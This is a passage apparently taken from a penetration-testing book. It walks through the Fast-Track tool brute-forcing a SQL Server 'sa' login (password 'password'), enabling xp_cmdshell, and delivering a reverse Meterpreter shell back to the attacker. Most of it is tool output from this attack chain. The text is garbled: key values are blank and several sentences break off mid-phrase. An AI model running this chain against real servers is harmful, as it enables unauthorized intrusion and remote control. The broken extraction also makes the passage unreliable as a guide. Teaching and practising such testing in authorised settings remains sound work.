background image



Brute forcing password of Sqlserver on IP
Brute forcing password of SqlServer on IP
Brute forcing password of Password1 on IP

. . . SNIP . . .

The following SQL Servers were compromised:

1. *** U/N: sa P/W: password ***


To interact with system, enter the SQL Server number.

Example: 1. you would type 1

Enter the number:  

After selecting Attempt SQL Ping and Auto Quick Brute Force at  , you 

will be prompted for a SQL database username  , followed by the range of 
IP addresses you want to scan at  . Answer 


 when asked whether you want 

to perform advanced server identification  . Although slow, this can be very 

The preceding output shows that Fast-Track successfully brute forced a 

system with the username of 


 and password 


. At this point, you can 

select the payload and compromise the system, as shown here.

Enter number here: 


Enabling: XP_Cmdshell...
Finished trying to re-enable xp_cmdshell stored procedure if disabled.

Configuration file not detected, running default path.
Recommend running install to configure Fast-Track.
Setting default directory...
What port do you want the payload to connect to you on: 


Metasploit Reverse Meterpreter Upload Detected..
Launching Meterpreter Handler.
Creating Metasploit Reverse Meterpreter Payload..
Sending payload: c88f3f9ac4bbe0e66da147e0f96efd48dad6
Sending payload: ac8cbc47714aaeed2672d69e251cee3dfbad
Metasploit payload delivered..
Converting our payload to binary, this may take a few...
Cleaning up...
Launching payload, this could take up to a minute...
When finished, close the metasploit handler window to return to other 
compromised SQL Servers.
[*] Please wait while we load the module tree...
[*] Handler binding to LHOST
[*] Started reverse handler
[*] Starting the payload handler...